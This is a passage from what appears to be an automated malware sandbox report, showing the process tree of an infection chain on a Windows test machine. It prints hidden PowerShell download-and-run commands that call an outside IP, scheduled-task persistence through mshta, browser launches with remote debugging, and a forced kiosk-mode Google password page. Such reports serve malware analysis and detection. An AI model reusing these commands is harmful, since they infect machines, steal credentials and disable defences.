                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5800
                                        • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:408
                                          • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
                                            4⤵
                                              PID:1252
                                          • C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: AddClipboardFormatListener
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of SetWindowsHookEx
                                            PID:3336
                                          • C:\Users\Admin\AppData\Local\Temp\1091274101\36c0490467.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1091274101\36c0490467.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of SendNotifyMessage
                                            PID:5324
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn JmLyfmaJCXv /tr "mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta" /sc minute /mo 25 /ru "Admin" /f
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5364
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn JmLyfmaJCXv /tr "mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta" /sc minute /mo 25 /ru "Admin" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:5440
                                            • C:\Windows\SysWOW64\mshta.exe
                                              mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta
                                              4⤵
                                              • Checks computer location settings
                                              • System Location Discovery: System Language Discovery
                                              PID:5372
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                                5⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5516
                                                • C:\Users\Admin\AppData\Local\TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
                                                  "C:\Users\Admin\AppData\Local\TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE"
                                                  6⤵
                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • Modifies Windows Defender TamperProtection settings
                                                  • Modifies Windows Defender notification settings
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Windows security modification
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6088
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5864
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5916
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 2
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Delays execution with timeout.exe
                                                PID:5968
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3024
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5216
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5692
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4048
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5868
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5896
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn "ukW5wmaliqZ" /tr "mshta \"C:\Temp\uLU5RZ6Si.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:2612
                                              • C:\Windows\SysWOW64\mshta.exe
                                                mshta "C:\Temp\uLU5RZ6Si.hta"
                                                5⤵
                                                • Checks computer location settings
                                                • System Location Discovery: System Language Discovery
                                                PID:3048
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                  6⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Downloads MZ/PE file
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5160
                                                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                    7⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3884
                                          • C:\Users\Admin\AppData\Local\Temp\1091314001\9222c12528.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1091314001\9222c12528.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:5432
                                          • C:\Users\Admin\AppData\Local\Temp\1091315001\e984a62c31.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1091315001\e984a62c31.exe"
                                            3⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Downloads MZ/PE file
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Loads dropped DLL
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Checks processor information in registry
                                            PID:3480
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                              4⤵
                                              • Uses browser remote debugging
                                              • Enumerates system info in registry
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:6072
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa2100cc40,0x7ffa2100cc4c,0x7ffa2100cc58
                                                5⤵
                                                  PID:5976
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2044 /prefetch:2
                                                  5⤵
                                                    PID:1456
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1724,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2564 /prefetch:3
                                                    5⤵
                                                      PID:2084
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2072,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2516 /prefetch:8
                                                      5⤵
                                                        PID:4320
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
                                                        5⤵
                                                        • Uses browser remote debugging
                                                        PID:4800
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3388 /prefetch:1
                                                        5⤵
                                                        • Uses browser remote debugging
                                                        PID:5320
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4496 /prefetch:8
                                                        5⤵
                                                          PID:868
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4640 /prefetch:1
                                                          5⤵
                                                          • Uses browser remote debugging
                                                          PID:1668
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
                                                          5⤵
                                                            PID:1732
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8
                                                            5⤵
                                                              PID:5832
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                            4⤵
                                                            • Uses browser remote debugging
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            PID:548
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa210146f8,0x7ffa21014708,0x7ffa21014718
                                                              5⤵
                                                              • Checks processor information in registry
                                                              • Enumerates system info in registry
                                                              PID:5816
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                                                              5⤵
                                                                PID:6436
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                                                5⤵
                                                                  PID:6448
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
                                                                  5⤵
                                                                    PID:6512
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:6608
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:6632
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:1848
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:4928
                                                              • C:\Users\Admin\AppData\Local\Temp\1091316001\151f9773d5.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1091316001\151f9773d5.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:5184
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM firefox.exe /T
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5984
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM chrome.exe /T
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2256
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM msedge.exe /T
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5892
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM opera.exe /T
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4028
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM brave.exe /T
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2132
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                  4⤵
                                                                    PID:5448
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                      5⤵
                                                                      • Checks processor information in registry
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of SendNotifyMessage
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2156
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 26973 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b1dace8-fae1-4751-8108-1e3031637abf} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" gpu
                                                                        6⤵
                                                                          PID:5504
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 27893 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f689537-f748-4868-aef8-91ac8431fab7} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" socket
                                                                          6⤵
                                                                            PID:5004
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2876 -childID 1 -isForBrowser -prefsHandle 3004 -prefMapHandle 2716 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5db114c-8cb5-4625-9afc-1f2b771a91ca} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
                                                                            6⤵
                                                                              PID:1508
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4072 -childID 2 -isForBrowser -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 32383 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80a0cf43-9c9a-486b-bc32-f38c1071d267} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
                                                                              6⤵
                                                                                PID:4012
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4536 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4632 -prefsLen 32383 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f596949e-ab32-498e-a425-922c87f12a1b} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" utility
                                                                                6⤵
                                                                                • Checks processor information in registry
                                                                                PID:6312
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5080 -childID 3 -isForBrowser -prefsHandle 5124 -prefMapHandle 5144 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5ec683e-6c34-4250-8e20-0d79378b42b6} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
                                                                                6⤵
                                                                                  PID:7032
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 4 -isForBrowser -prefsHandle 5292 -prefMapHandle 5296 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b6593a7-9c75-4e81-9f97-8482f320de4e} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
                                                                                  6⤵
                                                                                    PID:7048
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 5 -isForBrowser -prefsHandle 5520 -prefMapHandle 5524 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d668f8c9-4ea7-4708-bac0-2766ec11f774} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
                                                                                    6⤵
                                                                                      PID:7064
                                                                              • C:\Users\Admin\AppData\Local\Temp\1091317001\5e812bac6f.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1091317001\5e812bac6f.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:4992
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn 3FugZmaIOcn /tr "mshta C:\Users\Admin\AppData\Local\Temp\C6JzDYaHP.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2496
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /tn 3FugZmaIOcn /tr "mshta C:\Users\Admin\AppData\Local\Temp\C6JzDYaHP.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                    5⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:3612
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  mshta C:\Users\Admin\AppData\Local\Temp\C6JzDYaHP.hta
                                                                                  4⤵
                                                                                  • Checks computer location settings
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2948
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                    5⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Downloads MZ/PE file
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:748
                                                                                    • C:\Users\Admin\AppData\Local\TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
                                                                                      "C:\Users\Admin\AppData\Local\TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE"
                                                                                      6⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:7104
                                                                              • C:\Users\Admin\AppData\Local\Temp\1091318001\30a0979fbd.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1091318001\30a0979fbd.exe"
                                                                                3⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6592
                                                                              • C:\Users\Admin\AppData\Local\Temp\1091319001\5fdc363345.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1091319001\5fdc363345.exe"
                                                                                3⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • System Location Discovery: System Language Discovery
